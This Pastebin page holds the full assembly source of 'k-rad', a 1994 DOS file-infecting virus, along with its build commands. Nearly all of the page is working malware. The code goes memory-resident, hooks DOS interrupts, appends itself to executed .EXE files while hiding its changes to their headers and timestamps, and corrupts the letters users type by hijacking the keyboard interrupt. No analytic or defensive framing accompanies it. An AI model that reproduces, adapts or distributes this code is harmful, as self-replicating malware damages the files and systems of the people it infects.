Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- comment #
- Source code of k-rad
- by Evil Avatar
- #
- ;===============================================================
- ;
- ; k-rad Virus
- ; (c) 1994 Evil Avatar
- ;
- ; TASM /M3 K-RAD
- ; TLINK /X K-RAD
- ; EXE2BIN K-RAD K-RAD.COM
- .model tiny
- .code
- org 0
- VLEN equ (end_virus-k_rad)
- ID equ 0d00dh
- VMEM equ (end_virus-k_rad+15)/16+1
- VSIZEK equ (end_virus-k_rad+1023)/1024
- ;=====( Entry point for EXE files )========================================
- k_rad: db 0b8h, 8ch, 0d3h, 15h, 33h, 75h, 72h, 0f9h, 0d4h, -1, 08ah, 0c4h
- mov ah, 0bh
- mov bx, ID
- int 21h ;installation check
- or bx, bx ;are we installed?
- je no_install ;yes? exit then
- push ds ;save PSP segment
- mov ax, ds
- dec ax ;get MCB segment
- mov ds, ax ;put MCB segment into DS
- sub di, di ;clear di for indexing
- cmp byte ptr ds:[di], 'Z' ;last MCB in chain?
- jnz no_install ;no? don't go resident
- sub word ptr ds:[di+3], VMEM ;shrink host allocation
- sub word ptr ds:[di+12h], VMEM ;alter PSP memory size field
- mov es, word ptr ds:[di+12h] ;get new virus segment
- call $+3
- pop si
- sub si, offset $-1 ;get a delta offset
- mov cx, (heap-k_rad+1)/2 ;size of virus in words
- rep movs word ptr es:[di], word ptr cs:[si] ;copy virus
- mov ds, cx ;get IVT/BIOS data area
- sub byte ptr ds:[413h], VSIZEK ;decrease total system memory
- lds bx, dword ptr ds:[21h*4] ;get int 21h address
- mov word ptr es:[save21], bx
- mov word ptr es:[save21+2], ds ;save address
- mov ds, cx
- lds bx, dword ptr ds:[9h*4] ;get int 9h address
- mov word ptr es:[save9], bx
- mov word ptr es:[save9+2], ds ;save address
- mov ds, cx
- cli ;clear ints for IVT maipulation
- mov word ptr ds:[21h*4], offset int21
- mov word ptr ds:[21h*4+2], es ;set new int 21h address
- mov word ptr ds:[9h*4], offset int9
- mov word ptr ds:[9h*4+2], es ;set new int 9h address
- sti ;restore ints
- pop ds ;restore PSP segment
- push ds
- pop es
- no_install:
- call delta
- delta: pop bp ;get delta offset
- mov ax, es ;get PSP segment
- add ax, 10h ;adjust for PSP
- add word ptr ss:[bp+cs_ip+2-delta], ax ;new CS
- add word ptr ss:[bp+ss_sp-delta], ax ;new SS
- cli ;clear ints for stack manipulation
- mov sp, word ptr ss:[bp+ss_sp+2-delta] ;set new SP
- mov ss, word ptr ss:[bp+ss_sp-delta] ;set new SS
- sti ;restore ints
- db 0eah
- cs_ip dd 0fff00000h ;set new CS:IP
- ss_sp dd ?
- ;=====( Interrupt 21h handler )============================================
- int21: cmp ah, 0bh
- jne i0 ;installation check
- cmp bx, ID ;is it an installation check?
- jne dos21 ;go? let DOS handle it
- sub bx, bx ;zero BX for logical or
- iret ;return to caller
- i0: cmp ax, 4b00h ;execute?
- je infect ;totally /<-RaD!
- dos21: jmp dword ptr cs:[save21] ;jump to dos
- db 'Made in the USA', 0 ;not an imported product
- ;=====( Infection routine )================================================
- infect: push ax bx cx dx bp si di ds es ;save calling registers
- cbw ;clear ax
- mov ds, ax ;get IVT
- cli ;clear ints for IVT manipulation
- mov word ptr ds:[24h*4], offset int24
- mov word ptr ds:[24h*4+2], cs ;set new int 24 handler
- sti ;restore ints
- mov ah, 3dh
- push es
- pop ds
- int 21h ;open file read/only
- jc no_good ;can't open? abort
- push ax ;save handle
- mov bx, 1220h
- xchg ax, bx
- int 2fh
- mov ax, 1216h
- sub bx, bx
- mov bl, byte ptr es:[di]
- int 2fh ;get SFT for handle
- push cs
- pop ds bx ;restore handle
- mov ah, 3fh
- mov cx, 1ch
- mov dx, offset buffer
- int 21h ;read in header
- xchg si, dx
- lodsw
- cmp ax, 'MZ' ;is it an .EXE?
- je do_it ;yeah? attempt an infection
- cmp ax, 'ZM' ;is it an screwy .EXE?
- je do_it ;yeah? attempt to infect it
- done: mov ah, 3eh
- int 21h ;close file
- no_good:
- pop es ds di si bp dx cx bx ax ;restore calling registers
- jmp dos21 ;jump to dos
- do_it: cmp word ptr ds:[si-2+12h], ID ;check checksum for infection
- je done ;infected? abort
- cmp word ptr ds:[si-2+0ch], -1 ;requests maximum memory?
- jne done ;no? can't infect it properly
- cmp word ptr ds:[si-2+1ah], 0 ;is it an overlay?
- jnz done ;yes? can't infect it properly
- mov ax, 4202h
- sub cx, cx
- cwd
- int 21h ;go to end of file
- push bx es di ax dx cs ;save registers
- pop es
- add word ptr ds:[si-2+0ah], VMEM-1 ;set new minimum memory
- add ax, (heap-k_rad)
- adc dx, 0
- mov cx, 200h
- div cx ;calculate pages in infected file
- mov word ptr ds:[si], dx ;put it in header
- or dx, dx ;remainder?
- jz no_remainder ;no? no adjustment necessary
- inc ax ;round up
- no_remainder:
- mov word ptr ds:[si-2+4], ax ;save it
- lea si, [si-2+14h] ;pointer to old CS:IP
- lea di, [cs_ip]
- movsw
- movsw ;save it
- sub si, 0ah ;point to SS:SP
- movsw
- movsw ;save it
- pop dx ax ;restore file size
- mov cx, 10h ;all the below stuff calculates
- div cx ;the new CS:IP/SS:SP
- mov bx, word ptr ds:[si-0eh-4+8]
- sub ax, bx
- sbb dx, 0
- adjust_ip: ;make sure IP is less than 16
- cmp dx, cx ;so SS can be in the same segment
- jb fixed_ip
- inc ax
- sub dx, cx
- jmp adjust_ip
- fixed_ip:
- mov cx, ID ;this below stuff saves the new
- lea di, [buffer+0eh] ;CS:IP, SS:SP, and negative
- stosw ;checksum
- xchg ax, cx
- stosw
- stosw
- xchg ax, dx
- stosw
- xchg ax, cx
- stosw
- pop di es bx ;restore handle and SFT
- mov word ptr es:[di+2], 2 ;set to read/write
- mov ah, 40h
- mov cx, (heap-k_rad)
- cwd
- int 21h ;write virus to file
- mov word ptr es:[di+15h], 0
- mov word ptr es:[di+17h], 0 ;go to start of file
- mov ah, 40h
- mov cx, 1ch
- lea dx, [buffer]
- int 21h ;write new header
- mov ax, 5701h
- mov cx, word ptr es:[di+0dh]
- mov dx, word ptr es:[di+0fh]
- int 21h ;restore time/date
- jmp done ;exit. done infecting
- ;=====( Critical error handler )===========================================
- int24: iret
- ;=====( Interrupt 9h handler )=============================================
- int9: push ax bx cx dx
- mov ah, 0fh
- int 10h ;get page number
- mov ah, 3
- int 10h ;get cursor position
- mov ah, 2
- dec dl
- int 10h ;set position to previous character
- mov ah, 8
- int 10h ;get character
- and al, 5fh ;make uppercase
- cmp al, 41h ;check if it is a letter
- jb no_change ;if not then exit
- cmp al, 5ah
- ja no_change
- push ax ;save it
- mov ah, 2
- dec dl
- int 10h ;set position to previous character
- mov ah, 8
- int 10h ;get character
- cmp al, 41h ;is it uppercase?
- jb no_fix ;no? make next character uppercase
- cmp al, 5ah ;is it uppercase?
- ja no_fix ;no? make next one uppercase
- fix: pop ax ;restore old letter
- add al, 20h ;make lowercase
- jmp new_char
- no_fix: pop ax ;restore old letter
- new_char:
- inc dl
- mov ah, 2
- int 10h ;move forward one character
- mov ah, 0ah
- mov cx, 1
- int 10h ;write new letter
- no_change:
- mov ah, 2
- inc dl
- int 10h ;restore old cursor position
- pop dx cx bx ax ;restore used registers
- jmp dword ptr cs:[save9] ;jump to old int 9 handler
- ;=====( Virus data area )==================================================
- virus db '[k-rad]', 0
- author db 'by Evil Avatar', 0
- heap:
- save21 dd ?
- save9 dd ?
- buffer db 1ch dup (?)
- end_virus:
- end k_rad
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement